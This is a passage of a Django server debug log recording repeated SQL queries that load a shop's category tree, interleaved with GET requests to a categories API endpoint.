"shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:04:38,311 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:04:38,315 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:04:38,319 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:04:38,326 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:04:38,330 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:04:38,333 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:04:38,338 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:04:38,342 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:04:38,346 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:04:38,351 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:04:38,354 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:04:38,358 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:04:38,363 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:04:38,367 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:04:38] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:04:38,920 utils 4252 140031503103744 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:04:38,931 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:04:38,937 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:04:38,941 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:04:38,947 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 07:04:38,951 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 07:04:38,954 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 07:04:38,958 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:04:38,962 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 07:04:38,968 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 07:04:38,972 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 07:04:38,976 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 07:04:38,980 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 07:04:38,984 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 07:04:38,995 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 07:04:38,999 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 07:04:39,003 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 07:04:39,007 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 07:04:39,010 utils 4252 140031732287232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 15; args=(15,) DEBUG 2019-12-20 07:04:39,016 utils 4252 140031503103744 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 07:04:39,022 utils 4252 140031732287232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 07:04:39,023 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 07:04:39,028 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) [20/Dec/2019 07:04:39] "GET /api/v1/categories/15 HTTP/1.0" 200 223 DEBUG 2019-12-20 07:04:39,033 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 07:04:39,037 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 07:04:39,041 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 07:04:39,045 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 07:04:39,051 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 07:04:39,054 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 07:04:39,058 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 07:04:39,062 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 07:04:39,066 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 07:04:39,072 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 07:04:39,075 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 07:04:39,079 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 07:04:39,083 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 07:04:39,087 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 07:04:39,093 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 07:04:39,097 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 07:04:39,101 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 07:04:39,105 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 07:04:39,109 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 07:04:39,113 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 07:04:39,119 utils 4252 140031503103744 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 07:04:39,123 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 07:04:39,127 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 07:04:39,132 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 07:04:39,136 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 07:04:39] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 07:04:39,589 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 07:04:39,596 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 07:04:39,599 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 07:04:39,602 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 07:04:39,605 utils 4252 140031503103744 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 